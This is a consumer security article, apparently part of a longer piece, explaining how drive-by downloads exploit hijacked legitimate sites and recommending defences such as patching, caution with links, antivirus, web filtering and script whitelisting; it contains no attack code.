Defending against drive-by downloads
by Corey Nachreiner - Director of Security Strategy at WatchGuard - Monday, 3 February 2014.
The attackers search for web application vulnerabilities in popular and legitimate web sites, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit these problems to inject malicious code into the legitimate site, redirecting anyone who visits the site to malicious DbD code.

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. However, today any site on the Internetóeven the ones you trust the mostómay have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversaryís techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is, and how they work, hereís a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more Ė In ďcomputer-ese,Ē patching means to apply the latest updates to your computer software. As mentioned, web sites canít forcefully download software to your computer unless they can take advantages of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed. If you keep your software up to date, most of attacks will fail. Obviously patch you web browser, but also know hackers are focusing on exploiting Java and Flash vulnerabilities lately. You should patch these packages just as aggressively as the browser itself. In fact, I would recommend disabling Java if you can.

Donít click unsolicited links Ė Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably canít convince you not to click on links from your friends (or ones that seem like they come from your friends), but at least remain wary of them, and look at the URL for the link before clicking it. I would also be careful around shortened links, and leverage tools to expand and preview these links before following them. Hereís a quick tip; if you add a ď+Ē character to the end of a link, you will see a preview of the actual URL before visiting it.

Use antivirus (AV) and intrusion prevention (IPS) Ė While vigilance and good practices can help you avoid many attacks, no one is perfect. There will be a day that even the best of us stumble on DbD attack sites. IPS systems can frequently detect the network exploits these attacks leverage, and AV systems can often recognize the malicious payloads they try to silently download. Use AV and IPS systems, and keep them up to date.

Use reputation-based web-filtering solutions Ė The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to keep track of the latest malware distributing sites, and offer reputation services that can keep you and your users away from them. You should consider using web-filtering solutions to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others) Ė Without going into all the technical details, know that many DbD attacks rely on web scripting languages, such as JavaScript and ActiveX, to carry out their attacks. Disabling these scripting technologies would block a huge majority of DbD attacks. Unfortunately, itís not quite that simple. Many legitimate web sites also use these scripting languages for perfectly normal aspects of their web site. Thatís why I recommend script whitelisting technologies like Firefoxís NoScript or Chromeís NotScripts or Click-to-Play. These plugins will prevent scripts and some dynamic web content from running by default, but also allow you to easily whitelist sites you trust.


Harnessing artificial intelligence to build an army of virtual analysts

PatternEx, a startup that gathered a team of AI researcher from MIT CSAIL as well as security and distributed systems experts, is poised to shake up things in the user and entity behavior analytics market.

Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.

Daily digest

Receive a daily digest of the latest security news.

Tue, Feb 9th